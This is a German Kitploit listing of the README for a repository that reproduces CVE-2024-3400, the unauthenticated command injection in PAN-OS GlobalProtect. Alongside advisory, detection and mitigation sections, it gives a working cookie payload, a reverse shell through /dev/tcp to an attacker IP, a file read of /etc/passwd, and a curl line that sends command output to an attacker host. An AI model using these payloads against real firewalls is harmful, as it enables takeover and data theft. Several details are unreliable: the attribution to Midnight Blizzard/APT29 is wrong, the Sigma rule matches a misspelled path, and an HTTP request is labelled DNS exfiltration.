Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-3400-panos_rce_reproduction — Reproduktion von cve-2024-3400-panos_rce_reproduction | Kitploit
Tools/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed TeamingLabs & Praxis
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

Reproduktion von cve-2024-3400-panos_rce_reproduction

Repository anzeigen
3vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-3400: Palo Alto PAN-OS GlobalProtect Befehlsinjektion RCE

CVSS 10.0 KRITISCH | CWE-78: OS-Befehlsinjektion | Massenhaft in freier Wildbahn ausgenutzt


Überblick

CVE-2024-3400 ist eine Befehlsinjektions-Schwachstelle vor der Authentifizierung in den GlobalProtect-Portal- und Gateway-Schnittstellen von Palo Alto Networks PAN-OS. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige Befehle mit Root-Rechten auf der betroffenen Firewall auszuführen.

  • Entdeckt von: Volexity (April 2024)
  • Zugeschriebener Bedrohungsakteur: UNC4554 / Midnight Blizzard (staatlich gefördert, Russland)
  • CVE-ID: CVE-2024-3400
  • CVSS-Score: 10.0 (Kritisch)
  • CWE: CWE-78 (Unzureichende Neutralisierung spezieller Elemente in einem OS-Befehl)
  • Auswirkung: Vollständige Kompromittierung von PAN-OS-Firewall-Appliances, laterale Bewegung, Ransomware-Einsatz
  • Status: Vor der öffentlichen Offenlegung als 0-Day aktiv ausgenutzt

Technische Details

Grundursache

Die Schwachstelle liegt in der Sitzungscookie-Verarbeitung der GlobalProtect-Portal- und Gateway-Komponente. Die Funktion, die für die Verarbeitung des SESSID-Cookies zuständig ist, unterlässt es, die vom Benutzer gelieferten Eingaben ordnungsgemäß zu bereinigen, bevor sie an einen Shell-Befehl übergeben wird.

Konkret führt eine nicht authentifizierte HTTP-Anfrage an den GlobalProtect-Portal-Endpunkt (/global-protect/login.esp) mit einem manipulierten SESSID-Cookie, das eingebettete Shell-Metazeichen (Backticks und Variablenexpansion) enthält, zu einer Befehlsinjektion.

Injektionsmechanismus

Der anfällige Codepfad funktioniert wie folgt:

  1. Das GlobalProtect-Portal empfängt eine Anfrage an /global-protect/login.esp
  2. Der Wert des SESSID-Cookies wird ohne Bereinigung extrahiert
  3. Dieser Wert wird in eine Shell-Befehlszeichenfolge interpoliert
  4. Der Befehl wird über system() oder eine ähnliche OS-Befehlsausführungsfunktion ausgeführt
  5. Da die Anwendung als Root läuft, wird der injizierte Befehl mit vollen Systemrechten ausgeführt

Payload-Konstruktion

Die Injektions-Payload verwendet in Backticks gesetzte Befehle innerhalb des SESSID-Cookies:

root@kitploit:~
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

Die Pfad-Traversal (/../../../) verlässt das vorgesehene Verzeichnis, und der in Backticks gesetzte COMMAND-Teil veranlasst die Shell, die Eingabe des Angreifers auszuführen. Umleitung der Ausgabe oder Reverse-Shell-Mechanismen können verwendet werden, um Befehlsergebnisse zu exfiltrieren.


Betroffene Versionen

PAN-OS-VersionBetroffenBehoben in
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h1011.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3

Hinweis: PAN-OS 9.x und frühere Versionen sind nicht betroffen. Cloud NGFW und Prisma Access sind nicht betroffen.


Ausnutzung

Angriffsvektor

  • Netzwerk: Remote
  • Authentifizierung: Keine erforderlich
  • Erforderliche Berechtigung: Keine
  • Benutzerinteraktion: Keine
  • Auswirkung: Vollständige Kompromittierung von Vertraulichkeit, Integrität und Verfügbarkeit

Beobachtete Aktivitäten des Bedrohungsakteurs

Es wurde beobachtet, dass UNC4554 / Midnight Blizzard (APT29) CVE-2024-3400 ab März 2024 als 0-Day ausnutzte. Volexity veröffentlichte ihre Analyse am 12. April 2024. Die Angriffsmuster umfassten:

  1. Erstzugriff: Massenhaftes Scannen nach exponierten GlobalProtect-Portalen
  2. Befehlsausführung: Einsetzen von maßgeschneiderten Python-Backdoors über den Cookie-Injektionsvektor
  3. Persistenz: Installation der UPSTYLE-Backdoor, Diebstahl von Anmeldedaten, Extraktion von Konfigurationen
  4. Laterale Bewegung: Nutzung kompromittierter Firewalls als Einstiegspunkte in interne Netzwerke
  5. Datencxfiltration: Stehlen von Konfigurationsdateien, VPN-Anmeldedaten und Sitzungstokens
  6. Ransomware: Mehrere Vorfälle mit Ransomware-Einsatz nach der anfänglichen Kompromittierung

Verfügbarkeit von Proof-of-Concept

Es wurden mehrere öffentliche PoCs veröffentlicht. Dieses Repository stellt einen funktionsfähigen Exploit für autorisierte Tests bereit.


Reproduktionsschritte

Anforderungen

  • Python 3.8+
  • requests-Bibliothek
  • Ziel: Palo Alto PAN-OS mit einem exponierten, anfälligen GlobalProtect-Portal
  • Nur mit autorisiertem Zugriff

Einrichtung

root@kitploit:~
pip install requests

Basisexploit

root@kitploit:~
python exploit.py --target https://vulnerable-firewall.example.com --command "id"

Reverse-Shell-Beispiel

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 4444

# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

Beliebige Datei lesen

root@kitploit:~
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

Proof-of-Concept (curl)

root@kitploit:~
# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

PoC-Skript

Siehe exploit.py in diesem Repository für einen voll ausgestatteten Python-Exploit mit Unterstützung für:

  • Beliebige Befehlsausführung
  • Optionale Proxy-Unterstützung (Burp Suite / mitmproxy)
  • SSL-Verifizierungssteuerung
  • Timeout- und Wiederholungsbehandlung
  • Antwortanalyse

Erkennung

IOCs

  • Anfragen an /global-protect/login.esp mit ungewöhnlich langen oder verdächtigen SESSID-Cookies
  • Cookies, die Pfad-Traversal-Sequenzen (/../../) in Kombination mit Backtick-Zeichen enthalten
  • Unerwartete Prozesse, die von der GlobalProtect-Komponente gestartet werden
  • Ausgehende Verbindungen von der Firewall zu unbekannten IP-Adressen auf ungewöhnlichen Ports
  • Dateien mit .py-Erweiterung, die nach /opt/panlogs/tmp/device_telemetry/ geschrieben werden

Sigma-Regel (vereinfacht)

root@kitploit:~
title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

Gegenmaßnahmen

Sofortmaßnahmen

  1. PAN-OS aktualisieren auf die oben aufgeführten behobenen Versionen
  2. Falls ein sofortiges Patchen nicht möglich ist, wenden Sie einen der folgenden Workarounds an:
    • Device-Telemetrie deaktivieren: set deviceconfig system telemetry disable yes (blockiert den anfälligen Codepfad, ohne einen Neustart zu erfordern)
    • Zugriffskontrolle für GlobalProtect-Portal/Gateway: Beschränken Sie den Zugriff auf vertrauenswürdige Quell-IPs
  3. Auf Kompromittierung prüfen: Suchen Sie nach nicht autorisierten Dateien in /opt/panlogs/tmp/device_telemetry/
  4. Protokolle prüfen: Überprüfen Sie die GlobalProtect-Anmeldeprotokolle auf anomale SESSID-Cookie-Werte

Permanenter Fix

Wenden Sie den von Palo Alto Networks bereitgestellten Hotfix an. Der Fix bereinigt die Cookie-Eingabe ordnungsgemäß, bevor der Shell-Befehl erstellt wird.

Kompromittierungsbewertung

Wenn Sie eine Ausnutzung vermuten:

  1. Erstellen Sie forensische Images der betroffenen Firewalls
  2. Überprüfen Sie alle Konfigurationsänderungen (Zeitstempel der letzten Änderung)
  3. Überprüfen Sie laufende Prozesse und Cron-Jobs
  4. Suchen Sie nach nicht autorisierten SSH-Schlüsseln und Benutzerkonten
  5. Rotieren Sie alle VPN-Anmeldedaten und gemeinsam genutzten Geheimnisse
  6. Untersuchen Sie den Netzwerkverkehr auf C2-Kommunikationsmuster

Referenzen

QuelleLink
Palo Alto Security Advisoryhttps://security.paloaltonetworks.com/CVE-2024-3400
Volexity Analysehttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/
NVD-Eintraghttps://nvd.nist.gov/vuln/detail/CVE-2024-3400
CWE-78-Detailshttps://cwe.mitre.org/data/definitions/78.html
CISA KEVhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
ATT&CK-Technikhttps://attack.mitre.org/techniques/T1190/

Haftungsausschluss

Dieses Repository wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Die nicht autorisierte Ausnutzung dieser Schwachstelle ist illegal. Die Autoren sind nicht verantwortlich für den Missbrauch dieser Informationen. Stellen Sie stets sicher, dass Sie vor dem Testen eines Systems eine ausdrückliche schriftliche Genehmigung haben.


Lizenz

MIT-Lizenz – Dieser Inhalt wird für defensive Sicherheitsforschung und autorisierte Tests bereitgestellt.

Tool herunterladen